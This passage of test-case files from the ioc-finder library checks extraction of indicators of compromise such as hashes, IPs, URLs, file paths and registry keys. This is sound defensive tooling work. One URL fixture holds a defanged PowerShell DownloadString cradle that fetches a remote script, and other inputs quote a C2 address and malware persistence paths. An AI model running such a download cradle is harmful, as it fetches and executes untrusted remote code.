 28 |     ],  # I don't like that the components of an ipv6 can be parsed as an ssdeep... I've ticketed this here: https://github.com/fhightower/ioc-finder/issues/228
 29 |     "asns": ["ASN123"],
 30 |     "cves": ["CVE-2022-1234"],
 31 |     "registry_key_paths": [r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows"],
 32 |     "google_adsense_publisher_ids": ["pub-1234567891234567"],
 33 |     "google_analytics_tracker_ids": ["UA-000000-1"],
 34 |     "bitcoin_addresses": ["18ddf28a71089acdbab5038f58044c0a", "3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy"],
 35 |     "monero_addresses": [
 36 |         "496aKKdqF1xQSSEzw7wNrkZkDUsCD5cSmNCfVhVgEps52WERBcLDGzdF5UugmFoHMm9xRJdewvK2TFfAJNwEV25rTcVF5Vp"
 37 |     ],
 38 |     "mac_addresses": ["AA-F2-C9-A6-B3-4F"],
 39 |     "user_agents": [
 40 |         "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1) TLP"
 41 |     ],  # I don't like this parsing... I've ticketed this for improvement here: https://github.com/fhightower/ioc-finder/issues/227
 42 |     "tlp_labels": ["TLP:RED"],
 43 |     "mac_addresses": ["AA-F2-C9-A6-B3-4F"],
 44 |     "file_paths": ["~/foo/bar/abc.py"],
 45 |     "attack_mitigations": {"enterprise": ["M1036", "M1015"]},
 46 |     "attack_tactics": {"pre_attack": ["TA0012"]},
 47 |     "attack_techniques": {"pre_attack": ["T1329"]},
 48 | }
 49 | all_ioc_text = " ".join([val for sublist in IOC_EXAMPLES.values() for val in sublist])
 50 | 
 51 | # this is a hack to be fixed in https://github.com/fhightower/ioc-finder/issues/224
 52 | # imphashes and authentihashes require the hash to be prefixed with `imphash` and `authentihash` respectively, but when parsed, only the hash itself will be present
 53 | all_ioc_text = all_ioc_text.replace(IOC_EXAMPLES["imphashes"][0], f'imphash {IOC_EXAMPLES["imphashes"][0]}')  # type: ignore
 54 | all_ioc_text = all_ioc_text.replace(
 55 |     IOC_EXAMPLES["authentihashes"][0], f'authentihash {IOC_EXAMPLES["authentihashes"][0]}'  # type: ignore
 56 | )
 57 | all_ioc_text = all_ioc_text.replace(IOC_EXAMPLES["user_agents"][0], IOC_EXAMPLES["user_agents"][0].rstrip(" TLP"))  # type: ignore
 58 | # add the attack data
 59 | all_ioc_text = all_ioc_text + " " + " ".join(IOC_EXAMPLES["attack_mitigations"]["enterprise"])  # type: ignore
 60 | all_ioc_text = all_ioc_text + " " + " ".join(IOC_EXAMPLES["attack_tactics"]["pre_attack"])  # type: ignore
 61 | all_ioc_text = all_ioc_text + " " + " ".join(IOC_EXAMPLES["attack_techniques"]["pre_attack"])  # type: ignore
 62 | 
 63 | 
 64 | individual_included_ioc_types_tests = []
 65 | 
 66 | for type_ in DEFAULT_IOC_TYPES:
 67 |     individual_included_ioc_types_tests.append(
 68 |         param(
 69 |             all_ioc_text,
 70 |             {type_: IOC_EXAMPLES[type_]},
 71 |             {"included_ioc_types": [type_]},
 72 |             id=f"Only find {type_} with included_ioc_types",
 73 |         )
 74 |     )
 75 | 
 76 | 
 77 | multiple_included_ioc_types_tests = []
 78 | 
 79 | # make sure multiple included_ioc_types are handled properly
 80 | multiple_included_ioc_types_tests.append(
 81 |     param(
 82 |         "https://example.com/test%20page/foo.com/bingo.php?q=bar.com",
 83 |         {
 84 |             "domains": ["bar.com", "example.com", "foo.com"],
 85 |             "urls": ["https://example.com/test%20page/foo.com/bingo.php?q=bar.com"],
 86 |         },
 87 |         {"included_ioc_types": ["domains", "urls"]},
 88 |         id="Find multiple data types",
 89 |     )
 90 | )
 91 | 
 92 | # make sure multiple included_ioc_types work well with other kwargs - the list of domains is missing `foo.com` b/c `parse_from_url_path` is False
 93 | multiple_included_ioc_types_tests.append(
 94 |     param(
 95 |         "https://example.com/test%20page/foo.com/bingo.php?q=bar.com",
 96 |         {
 97 |             "domains": ["bar.com", "example.com"],
 98 |             "urls": ["https://example.com/test%20page/foo.com/bingo.php?q=bar.com"],
 99 |         },
100 |         {"included_ioc_types": ["domains", "urls"], "parse_from_url_path": False},
101 |         id="Find multiple data types",
102 |     )
103 | )
104 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/file_paths.py:
--------------------------------------------------------------------------------
 1 | from pytest import param
 2 | 
 3 | PATH_DATA = [
 4 |     param(
 5 |         """C:\\Users\\\\AppData \\Local\\Microsoft\\Windows\\shedaudio.exe
 6 | 
 7 |         C:\\Users\\\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia\\bin\\flashplayer.exe
 8 | 
 9 |         Typical Registry Keys:
10 | 
11 |         HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
12 | 
13 |         HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run
14 | 
15 |         HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
16 | 
17 |         System Root Directories:
18 | 
19 |         C:\\Windows\\11987416.exe
20 | 
21 |         C:\\Windows\\System32\\46615275.exe
22 | 
23 |         C:\\Windows\\System32\\shedaudio.exe
24 | 
25 |         C:\\Windows\\SysWOW64\\f9jwqSbS.exe""",
26 |         {
27 |             "file_paths": [
28 |                 "C:\\Users\\\\AppData \\Local\\Microsoft\\Windows\\shedaudio.exe",
29 |                 "C:\\Users\\\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia\\bin\\flashplayer.exe",
30 |                 "C:\\Windows\\11987416.exe",
31 |                 "C:\\Windows\\System32\\46615275.exe",
32 |                 "C:\\Windows\\System32\\shedaudio.exe",
33 |                 "C:\\Windows\\SysWOW64\\f9jwqSbS.exe",
34 |             ],
35 |             "registry_key_paths": [
36 |                 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
37 |                 "HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run",
38 |                 "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
39 |             ],
40 |         },
41 |         {},
42 |         id="file_path_1",
43 |     ),
44 |     param(
45 |         "/Library/Storage/File System/HFS/25cf5d02-e50b-4288-870a-528d56c3cf6e/pivtoken.appex",
46 |         {"file_paths": ["/Library/Storage/File System/HFS/25cf5d02-e50b-4288-870a-528d56c3cf6e/pivtoken.appex"]},
47 |         {},
48 |         id="file_path_2",
49 |     ),
50 |     param(
51 |         "and this is a file ~/foo/bar/abc.py",
52 |         {"file_paths": ["~/foo/bar/abc.py"], "domains": ["abc.py"]},
53 |         {},
54 |         id="file_path_3",
55 |     ),
56 |     param(
57 |         "test /Library/Storage/File System/HFS/25cf5d02-e50b-4288-870a-528d56c3cf6e/pivtoken.appex file",
58 |         {"file_paths": ["/Library/Storage/File System/HFS/25cf5d02-e50b-4288-870a-528d56c3cf6e/pivtoken.appex"]},
59 |         {},
60 |         id="file_path_4",
61 |     ),
62 |     param(
63 |         "another home directory ~/Desktop/test.py python file",
64 |         {"file_paths": ["~/Desktop/test.py"], "domains": ["test.py"]},
65 |         {},
66 |         id="file_path_5",
67 |     ),
68 |     # param(
69 |     #     "/Library/Storage/File System/HFS/25cf5d02-e50b-4288-870a-528d56c3cf6e/pivtoken.appex",
70 |     #     {'file_paths': ["/Library/Storage/File System/HFS/25cf5d02-e50b-4288-870a-528d56c3cf6e/pivtoken.appex"]},
71 |     #     {},
72 |     #     id="file_path_2"
73 |     # )
74 | ]
75 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/hashes.py:
--------------------------------------------------------------------------------
  1 | from pytest import param
  2 | 
  3 | HASH_DATA = [
  4 |     param(
  5 |         "{} {} {} {} {}".format("A" * 32, "a" * 32, "b" * 40, "c" * 64, "d" * 128),
  6 |         {
  7 |             "md5s": ["aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"],
  8 |             "sha1s": ["bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"],
  9 |             "sha256s": ["cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc"],
 10 |             "sha512s": [
 11 |                 "dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd"
 12 |             ],
 13 |         },
 14 |         {},
 15 |         id="random_hash_1",
 16 |     ),
 17 |     param(
 18 |         "1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U",
 19 |         {"ssdeeps": ["1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U"]},
 20 |         {},
 21 |         id="ssdeep_1",
 22 |     ),
 23 |     param(
 24 |         "ahdfadsfa 1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U,000/000/000000001 adfasf",
 25 |         {"ssdeeps": ["1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U"]},
 26 |         {},
 27 |         id="ssdeep_2",
 28 |     ),
 29 |     param(
 30 |         """c2b257868686c861d43c6cf3de146b8812778c8283f7d
 31 |         Threat  Zepakab/Zebrocy Downloader
 32 |         ssdeep  12288:QYV6MorX7qzuC3QHO9FQVHPF51jgcSj2EtPo/V7I6R+Lqaw8i6hG0:vBXu9HGaVHh4Po/VU6RkqaQ6F""",
 33 |         {"ssdeeps": ["12288:QYV6MorX7qzuC3QHO9FQVHPF51jgcSj2EtPo/V7I6R+Lqaw8i6hG0:vBXu9HGaVHh4Po/VU6RkqaQ6F"]},
 34 |         {},
 35 |         id="ssdeep_3",
 36 |     ),
 37 |     param(
 38 |         """393216:EW/eKCo9QgoHfHYebwoyC0QStQYEb+G8j3wfVOglnimQyCK+mteYREDWXKF2b:MKg3lbwoyCnCkNHlnimfCSQx8b,"000/000/000000001"
 39 |         196608:AGSE26mYSK0iwH8HW9TDl0vnvCZwZEkzzeap7R:Ak28siwH8eRSn25k3eg,"000/000/000000002"
 40 |         98304:O1OCzezOgr4XMP7Af0+Kh7MzplFKuu5XcS9QnCD/VWR6yf4OB6S/mwRTwjf0ih87:k/Y4XMT7YguEXqCD/VWR6yf4Ux/mwR0S,"000/000/000000003"
 41 |         96:ukILJhn54RewghSib4xGEHVLFNs+4tihJW6jJenUQrsIvpMMjUg:uk0Jx54usxJHh4gJrJenUQrs2pvIg,"000/000/000000004"
 42 |         196608:rNI4QlKQbWQobu0u3QRBBibfv+Z4Hjy5M+IjunAadLLtt42fAtQSqFhx:rNkK2obu0uBb3K4H28yAGc4RSax,"000/000/000000005"
 43 |         1536:mFbhArcCMbR0S/kjzU6El4mUIR2JPmvY3lpKa38fTXcTns+b3tfZyCLtRs:obNCMbWpU6SzFAPV3lpCjCsQRZyQt6,"000/000/000000006"
 44 |         48:CScrEd3jk5BsRSFCWfVsEWABbbpnWSgSX45dc6b5Qla9A+o5R6k7CyNRD5J:XcrEdzHRSFr9sE7XnsDe1CyNRNJ,"000/000/000000007"
 45 |         24:N8Rw5AF4REesFtPP6k216xoWya1oxOKHHwa8peRK8FdigZY5tODrRRK8RfMfde8:N8Rw5AF4+XPyooa2EKnwaGeRJFYpfwzQ,"000/000/000000008"
 46 |         1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U,"000/000/000000009""",
 47 |         {
 48 |             "ssdeeps": [
 49 |                 "393216:EW/eKCo9QgoHfHYebwoyC0QStQYEb+G8j3wfVOglnimQyCK+mteYREDWXKF2b:MKg3lbwoyCnCkNHlnimfCSQx8b",
 50 |                 "196608:AGSE26mYSK0iwH8HW9TDl0vnvCZwZEkzzeap7R:Ak28siwH8eRSn25k3eg",
 51 |                 "98304:O1OCzezOgr4XMP7Af0+Kh7MzplFKuu5XcS9QnCD/VWR6yf4OB6S/mwRTwjf0ih87:k/Y4XMT7YguEXqCD/VWR6yf4Ux/mwR0S",
 52 |                 "96:ukILJhn54RewghSib4xGEHVLFNs+4tihJW6jJenUQrsIvpMMjUg:uk0Jx54usxJHh4gJrJenUQrs2pvIg",
 53 |                 "1536:mFbhArcCMbR0S/kjzU6El4mUIR2JPmvY3lpKa38fTXcTns+b3tfZyCLtRs:obNCMbWpU6SzFAPV3lpCjCsQRZyQt6",
 54 |                 "48:CScrEd3jk5BsRSFCWfVsEWABbbpnWSgSX45dc6b5Qla9A+o5R6k7CyNRD5J:XcrEdzHRSFr9sE7XnsDe1CyNRNJ",
 55 |                 "24:N8Rw5AF4REesFtPP6k216xoWya1oxOKHHwa8peRK8FdigZY5tODrRRK8RfMfde8:N8Rw5AF4+XPyooa2EKnwaGeRJFYpfwzQ",
 56 |                 "1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U",
 57 |                 "196608:rNI4QlKQbWQobu0u3QRBBibfv+Z4Hjy5M+IjunAadLLtt42fAtQSqFhx:rNkK2obu0uBb3K4H28yAGc4RSax",
 58 |             ]
 59 |         },
 60 |         {},
 61 |         id="ssdeep_4",
 62 |     ),
 63 |     param(
 64 |         """SHA-256 093e394933c4545ba7019f511961b9a5ab91156cf791f45de074acad03d1a44a
 65 |         Dropper imphash: 18ddf28a71089acdbab5038f58044c0a
 66 |         C2 IP: 210.209.127.8:443
 67 |         imphash: 18ddf28a71089acdbab5038f58044c0a
 68 |         imphash 18ddf28a71089acdbab5038f58044c0a
 69 |         imphash  18ddf28a71089acdbab5038f58044c0a
 70 |         imphash:     18ddf28a71089acdbab5038f58044c0a
 71 |         imphash\t18ddf28a71089acdbab5038f58044c0a
 72 |         imphash\n18ddf28a71089acdbab5038f58044c0a
 73 |         imphash - 18ddf28a71089acdbab5038f58044c0a""",
 74 |         {
 75 |             "imphashes": [
 76 |                 "18ddf28a71089acdbab5038f58044c0a",
 77 |                 "18ddf28a71089acdbab5038f58044c0a",
 78 |                 "18ddf28a71089acdbab5038f58044c0a",
 79 |             ],
 80 |             "ipv4s": ["210.209.127.8"],
 81 |             "sha256s": ["093e394933c4545ba7019f511961b9a5ab91156cf791f45de074acad03d1a44a"],
 82 |         },
 83 |         {},
 84 |         id="imphash_1",
 85 |     ),
 86 |     param(
 87 |         """SHA-256 093e394933c4545ba7019f511961b9a5ab91156cf791f45de074acad03d1a44a
 88 |         Dropper import hash: 18ddf28a71089acdbab5038f58044c0a
 89 |         C2 IP: 210.209.127.8:443
 90 |         import hash: 18ddf28a71089acdbab5038f58044c0a
 91 |         import hash 18ddf28a71089acdbab5038f58044c0a
 92 |         import hash  18ddf28a71089acdbab5038f58044c0a
 93 |         import hash:     18ddf28a71089acdbab5038f58044c0a
 94 |         import hash\t18ddf28a71089acdbab5038f58044c0a
 95 |         import hash\n18ddf28a71089acdbab5038f58044c0a
 96 |         import hash - 18ddf28a71089acdbab5038f58044c0a""",
 97 |         {
 98 |             "imphashes": [
 99 |                 "18ddf28a71089acdbab5038f58044c0a",
100 |                 "18ddf28a71089acdbab5038f58044c0a",
101 |                 "18ddf28a71089acdbab5038f58044c0a",
102 |             ],
103 |             "ipv4s": ["210.209.127.8"],
104 |             "sha256s": ["093e394933c4545ba7019f511961b9a5ab91156cf791f45de074acad03d1a44a"],
105 |         },
106 |         {},
107 |         id="imphash_3",
108 |     ),
109 |     param(
110 |         """SHA-256 093e394933c4545ba7019f511961b9a5ab91156cf791f45de074acad03d1a44a
111 |         Dropper IMPORT HASH: 18ddf28a71089acdbab5038f58044c0a
112 |         C2 IP: 210.209.127.8:443
113 |         IMPORT HASH: 18ddf28a71089acdbab5038f58044c0a
114 |         IMPORT HASH 18ddf28a71089acdbab5038f58044c0a
115 |         IMPORT HASH  18ddf28a71089acdbab5038f58044c0a
116 |         IMPORT HASH:     18ddf28a71089acdbab5038f58044c0a
117 |         IMPORT HASH\t18ddf28a71089acdbab5038f58044c0a
118 |         IMPORT HASH\n18ddf28a71089acdbab5038f58044c0a
119 |         IMPORT HASH - 18ddf28a71089acdbab5038f58044c0a""",
120 |         {
121 |             "imphashes": [
122 |                 "18ddf28a71089acdbab5038f58044c0a",
123 |                 "18ddf28a71089acdbab5038f58044c0a",
124 |                 "18ddf28a71089acdbab5038f58044c0a",
125 |             ],
126 |             "ipv4s": ["210.209.127.8"],
127 |             "sha256s": ["093e394933c4545ba7019f511961b9a5ab91156cf791f45de074acad03d1a44a"],
128 |         },
129 |         {},
130 |         id="imphash_4",
131 |     ),
132 |     param(
133 |         """
134 |         authentihash 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
135 |         authentihash   3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
136 |         authentihash: 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
137 |         authentihash:     3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
138 |         authentihash - 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
139 |         authentihash-3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
140 |         authentihash\t3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
141 |         authentihash\n3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
142 |         """,
143 |         {
144 |             "authentihashes": [
145 |                 "3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4",
146 |                 "3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4",
147 |                 "3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4",
148 |             ]
149 |         },
150 |         {},
151 |         id="authentihash_1",
152 |     ),
153 |     param(
154 |         """
155 |         AUTHENTIHASH 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
156 |         AUTHENTIHASH   3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
157 |         AUTHENTIHASH: 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
158 |         AUTHENTIHASH:     3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
159 |         AUTHENTIHASH - 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
160 |         AUTHENTIHASH-3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
161 |         AUTHENTIHASH\t3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
162 |         AUTHENTIHASH\n3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
163 |         """,
164 |         {
165 |             "authentihashes": [
166 |                 "3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4",
167 |                 "3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4",
168 |                 "3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4",
169 |             ]
170 |         },
171 |         {},
172 |         id="authentihash_2",
173 |     ),
174 | ]
175 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/ids.py:
--------------------------------------------------------------------------------
 1 | from pytest import param
 2 | 
 3 | ID_DATA = [
 4 |     param(
 5 |         "pub-1234567891234567",
 6 |         {"google_adsense_publisher_ids": ["pub-1234567891234567"]},
 7 |         {},
 8 |         id="google_publisher_id_1",
 9 |     ),
10 |     param(
11 |         " pub-1234567891234567 pub-9383614236930773 ",
12 |         {"google_adsense_publisher_ids": ["pub-1234567891234567", "pub-9383614236930773"]},
13 |         {},
14 |         id="google_publisher_id_2",
15 |     ),
16 |     param(
17 |         " UA-000000-2 ", {"google_analytics_tracker_ids": ["UA-000000-2"]}, {}, id="google_analytics_id_1"
18 |     ),
19 |     param(
20 |         "UA-000000-2 UA-00000000-99",
21 |         {"google_analytics_tracker_ids": ["UA-000000-2", "UA-00000000-99"]},
22 |         {},
23 |         id="google_publisher_id_2",
24 |     ),
25 | ]
26 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/ip_addr.py:
--------------------------------------------------------------------------------
 1 | from pytest import param
 2 | 
 3 | IP_DATA = [
 4 |     param(
 5 |         "this is just a (1.2.3.54) test of 255.255.1.255 255.256.344.1",
 6 |         {"ipv4s": ["1.2.3.54", "255.255.1.255"]},
 7 |         {},
 8 |         id="ipv4_1",
 9 |     ),
10 |     param(
11 |         "2001:0db8:0000:0000:0000:ff00:0042:8329 testing 2001:db8:0:0:0:ff00:42:8329 shfaldkafsdfa 2001:db8::ff00:42:8329 asdfadfas afkj;fl ::1 kljfkadf 1:1 ",
12 |         {
13 |             "ipv6s": [
14 |                 "2001:0db8:0000:0000:0000:ff00:0042:8329",
15 |                 "2001:db8:0:0:0:ff00:42:8329",
16 |                 "2001:db8::ff00:42:8329",
17 |                 "::1",
18 |             ],
19 |             "ssdeeps": ["0000:0000:ff00", "2001:0db8:0000"],
20 |         },
21 |         {},
22 |         id="ipv6_1",
23 |     ),
24 |     param(
25 |         "1.2.3.4/0 1.2.3.4/10 1.2.3.4/20 1.2.3.4/32",
26 |         {"ipv4_cidrs": ["1.2.3.4/0", "1.2.3.4/10", "1.2.3.4/20", "1.2.3.4/32"], "ipv4s": {"1.2.3.4"}},
27 |         {},
28 |         id="ipv4_cidr1_1",
29 |     ),
30 | ]
31 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/mac_addr.py:
--------------------------------------------------------------------------------
 1 | from pytest import param
 2 | 
 3 | MAC_DATA = [  # hyphen-, colon- and dot-separated MAC addresses, upper case (mac_1) and lower case (mac_2); expected values keep the input's case and separators
 4 |     param(
 5 |         "AA-F2-C9-A6-B3-4F AB:F2:C9:A6:B3:4F ACF2.C9A6.B34F",
 6 |         {"mac_addresses": ["AA-F2-C9-A6-B3-4F", "AB:F2:C9:A6:B3:4F", "ACF2.C9A6.B34F"]},
 7 |         {},
 8 |         id="mac_1",
 9 |     ),
10 |     param(
11 |         "aa-f2-c9-a6-b3-4f ab:f2:c9:a6:b3:4f acf2.c9a6.b34f",
12 |         {"mac_addresses": ["aa-f2-c9-a6-b3-4f", "ab:f2:c9:a6:b3:4f", "acf2.c9a6.b34f"]},
13 |         {},
14 |         id="mac_2",
15 |     ),
16 | ]
17 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/tlp_labels.py:
--------------------------------------------------------------------------------
1 | from pytest import param
2 | 
3 | TLP_DATA = [  # inputs use loose spellings ("tlp amber", "tlp-Amber", "TLPRED", "TlpGreen"); expected labels are the normalized "TLP:<COLOR>" form
4 |     param("tlp amber and TLP:RED", {"tlp_labels": ["TLP:RED", "TLP:AMBER"]}, {}, id="tlp_1"),
5 |     param("tlp-Amber and TLPRED TlpGreen", {"tlp_labels": ["TLP:RED", "TLP:AMBER", "TLP:GREEN"]}, {}, id="tlp_2"),
6 | ]
7 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/urls.py:
--------------------------------------------------------------------------------
 1 | from pytest import param
 2 | 
 3 | URL_DATA = [  # each case: (input text, expected IOCs keyed by type, options dict - presumably find_iocs kwargs; confirm in the test runner)
 4 |     param(
 5 |         "https://example.com/test%20page/foo.com/bingo.php?q=bar.com",
 6 |         {
 7 |             "urls": ["https://example.com/test%20page/foo.com/bingo.php?q=bar.com"],
 8 |             "domains": ["bar.com", "foo.com", "example.com"],  # host, path and query-string domains are all expected
 9 |         },
10 |         {},
11 |         id="URL and domains parsed",
12 |     ),
13 |     param(
14 |         "Foo https://citizenlab.ca/about/), bar",
15 |         {
16 |             "urls": ["https://citizenlab.ca/about/"],
17 |         },
18 |         {"parse_domain_from_url": False},  # no "domains" entry is expected for this case
19 |         id="URL boundary w/ ) handled properly",
20 |     ),
21 |     param(
22 |         "DownloadString('https://example[.]com/rdp.ps1');g $I DownloadString(\"https://example[.]com/rdp.ps2\");g $I",
23 |         {
24 |             "urls": ["https://example.com/rdp.ps1", "https://example.com/rdp.ps2"],  # the "[.]" in the input is expected back as a plain "."
25 |         },
26 |         {"parse_domain_from_url": False},
27 |         id="URL boundary w/ single or double quotes handled properly",
28 |     ),
29 |     param(
30 |         "https://example.com/g//foo",
31 |         {
32 |             "urls": ["https://example.com/g//foo"],
33 |         },
34 |         {"parse_domain_from_url": False},
35 |         id="Consecutive slashes handled properly",
36 |     ),
37 | ]
38 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/user_agents.py:
--------------------------------------------------------------------------------
 1 | from pytest import param
 2 | 
 3 | UA_DATA = [  # each case: (input text, expected IOCs keyed by type, options dict - presumably find_iocs kwargs; confirm in the test runner)
 4 |     param(
 5 |         "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)",
 6 |         {"user_agents": ["Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"]},
 7 |         {},
 8 |         id="user_agent_1",
 9 |     ),
10 |     param(  # two lower-case user agents back to back; they are expected as two separate entries
11 |         "mozilla/5.0 (windows nt 6.1; wow64) applewebkit/535.11 (khtml, like gecko) chrome/17.0.963.56 safari/535.11 mozilla/5.0 (windows nt 6.1; wow64; rv:11.0) gecko firefox/11.0",
12 |         {
13 |             "user_agents": [
14 |                 "mozilla/5.0 (windows nt 6.1; wow64) applewebkit/535.11 (khtml, like gecko) chrome/17.0.963.56 safari/535.11",
15 |                 "mozilla/5.0 (windows nt 6.1; wow64; rv:11.0) gecko firefox/11.0",
16 |             ]
17 |         },
18 |         {},
19 |         id="user_agent_2",
20 |     ),
21 |     param(  # same as user_agent_2 but with mixed case; the expected values keep the input's case
22 |         "Mozilla/5.0 (Windows nt 6.1; wow64) Applewebkit/535.11 (khtml, like Gecko) Chrome/17.0.963.56 Safari/535.11 Mozilla/5.0 (Windows nt 6.1; wow64; rv:11.0) Gecko Firefox/11.0",
23 |         {
24 |             "user_agents": [
25 |                 "Mozilla/5.0 (Windows nt 6.1; wow64) Applewebkit/535.11 (khtml, like Gecko) Chrome/17.0.963.56 Safari/535.11",
26 |                 "Mozilla/5.0 (Windows nt 6.1; wow64; rv:11.0) Gecko Firefox/11.0",
27 |             ]
28 |         },
29 |         {},
30 |         id="user_agent_3",
31 |     ),
32 | ]
33 | 


--------------------------------------------------------------------------------
/tests/test_cli.py:
--------------------------------------------------------------------------------
  1 | import json
  2 | 
  3 | from click.testing import CliRunner
  4 | 
  5 | from ioc_finder import ioc_finder
  6 | 
  7 | 
  8 | def test_parse_cli_stdin():
  9 |     runner = CliRunner()
 10 |     result = runner.invoke(
 11 |         ioc_finder.cli_find_iocs, input="This is just an example.com https://example.org/test/bingo.php"
 12 |     )
 13 |     assert result.exit_code == 0
 14 |     output = result.output.strip()
 15 |     assert "example.org" in output
 16 |     assert "example.com" in output
 17 |     assert "https://example.org/test/bingo.php" in output
 18 | 
 19 | 
 20 | def test_ioc_parsing_cli():
 21 |     runner = CliRunner()
 22 |     result = runner.invoke(ioc_finder.cli_find_iocs, ["This is just an example.com https://example.org/test/bingo.php"])
 23 |     assert result.exit_code == 0
 24 |     output = result.output.strip()
 25 |     assert "example.org" in output
 26 |     assert "example.com" in output
 27 |     assert "https://example.org/test/bingo.php" in output
 28 | 
 29 | 
 30 | def test_cli_without_domain_from_url_parsing():  # with --no_url_domain_parsing only "example.com" is expected under "domains", not the URL's example.org
 31 |     runner = CliRunner()
 32 |     result = runner.invoke(
 33 |         ioc_finder.cli_find_iocs,
 34 |         ["This is just an example.com https://example.org/test/bingo.php", "--no_url_domain_parsing"],
 35 |     )
 36 |     assert result.exit_code == 0
 37 |     print(result.output.strip())  # debugging aid: pytest shows captured stdout when the test fails
 38 |     assert (  # exact comparison against the complete JSON document, so key order and indentation matter
 39 |         result.output.strip()
 40 |         == """{
 41 |     "asns": [],
 42 |     "attack_mitigations": {
 43 |         "enterprise": [],
 44 |         "mobile": []
 45 |     },
 46 |     "attack_tactics": {
 47 |         "enterprise": [],
 48 |         "mobile": [],
 49 |         "pre_attack": []
 50 |     },
 51 |     "attack_techniques": {
 52 |         "enterprise": [],
 53 |         "mobile": [],
 54 |         "pre_attack": []
 55 |     },
 56 |     "authentihashes": [],
 57 |     "bitcoin_addresses": [],
 58 |     "cves": [],
 59 |     "domains": [
 60 |         "example.com"
 61 |     ],
 62 |     "email_addresses": [],
 63 |     "email_addresses_complete": [],
 64 |     "file_paths": [],
 65 |     "google_adsense_publisher_ids": [],
 66 |     "google_analytics_tracker_ids": [],
 67 |     "imphashes": [],
 68 |     "ipv4_cidrs": [],
 69 |     "ipv4s": [],
 70 |     "ipv6s": [],
 71 |     "mac_addresses": [],
 72 |     "md5s": [],
 73 |     "monero_addresses": [],
 74 |     "registry_key_paths": [],
 75 |     "sha1s": [],
 76 |     "sha256s": [],
 77 |     "sha512s": [],
 78 |     "ssdeeps": [],
 79 |     "tlp_labels": [],
 80 |     "urls": [
 81 |         "https://example.org/test/bingo.php"
 82 |     ],
 83 |     "user_agents": [],
 84 |     "xmpp_addresses": []
 85 | }"""
 86 |     )
 87 | 
 88 | 
 89 | def test_cli_parsing_urls_without_scheme():
 90 |     runner = CliRunner()
 91 |     result = runner.invoke(ioc_finder.cli_find_iocs, ["This is just an example.com example.org/test/bingo.php"])
 92 |     assert result.exit_code == 0
